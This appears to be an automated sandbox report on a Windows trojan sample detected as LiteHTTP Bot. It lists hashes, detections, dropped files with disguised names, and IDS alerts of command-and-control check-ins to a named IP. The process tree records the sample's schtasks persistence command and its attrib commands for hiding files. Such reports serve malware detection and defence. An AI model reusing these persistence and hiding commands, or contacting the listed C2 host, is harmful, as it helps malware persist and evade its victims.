Windows Analysis Report
3u8A2xjbBT.exe

Overview

General Information

Sample name: 3u8A2xjbBT.exe
renamed because original name is a hash value
Original sample name: 8391d3b5332c4b1164333ddce388a8c7.exe
Analysis ID: 1545318
MD5: 8391d3b5332c4b1164333ddce388a8c7
SHA1: b982fc92ed38565debf033b0ffaa2181a8caa5e7
SHA256: e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
Tags: 32, exe, trojan

Detection

LiteHTTP Bot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LiteHTTP Bot
.NET source code contains potential unpacker
AI detected suspicious sample
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3u8A2xjbBT.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 1888 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2184 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2028 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2156 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5828 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7152 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3896 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2032 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3164 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6624 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5716 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 3u8A2xjbBT.exe (PID: 2908 cmdline: C:\Users\user\Desktop\3u8A2xjbBT.exe MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 4136 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5432 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5936 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 3u8A2xjbBT.exe (PID: 4704 cmdline: "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 1200 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3576 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6644 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7136 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5980 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 368 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2532 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
3u8A2xjbBT.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\OneDrive\microsoft.net.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\OneDrive\windows nt.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\OneDrive\java.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\OneDrive\windowspowershell.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\OneDrive\google.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |

Source | Rule | Description | Author | Strings
16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |

Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\3u8A2xjbBT.exe, ProcessId: 6464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk

AV Detection

Source: 3u8A2xjbBT.exe, Avira: detected
Source: C:\Users\user\OneDrive\msbuild.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\jdownloader.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\msecache.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\google.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\windows mail.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\common files.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\java.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\windows defender.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\microsoft.net.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\microsoft.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\reference assemblies.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\microsoft office.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\internet explorer.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\autoit3.exe, Avira: detection malicious, Label: DR/AVI.Agent.mrstb
Source: C:\Users\user\OneDrive\autoit3.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\common files.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\google.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\internet explorer.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\java.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\jdownloader.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\microsoft office.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\microsoft.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\microsoft.net.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\msbuild.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\msecache.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\reference assemblies.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows defender.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows mail.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows media player.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows multimedia platform.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows nt.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows photo viewer.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows portable devices.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windows sidebar.exe, ReversingLabs: Detection: 67%
Source: C:\Users\user\OneDrive\windowspowershell.exe, ReversingLabs: Detection: 67%
Source: 3u8A2xjbBT.exe, ReversingLabs: Detection: 67%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\OneDrive\msbuild.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\jdownloader.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\msecache.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\google.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\windows mail.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\common files.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\java.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\windows defender.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.net.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\reference assemblies.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft office.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\internet explorer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\autoit3.exe, Joe Sandbox ML: detected
Source: 3u8A2xjbBT.exe, Joe Sandbox ML: detected

Bitcoin Miner

Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: CryptoNight
Source: 3u8A2xjbBT.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3u8A2xjbBT.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (0_2_0166ADF4)
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (0_2_0166AE00)
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (15_2_02A1AE00)
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (15_2_02A1ADF4)
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (16_2_0182ADF4)
Source: C:\Users\user\Desktop\3u8A2xjbBT.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h (16_2_0182AE00)

                            Networking

                            barindex
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49989 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49989 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49989 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49993 -> 87.120.126.5:80
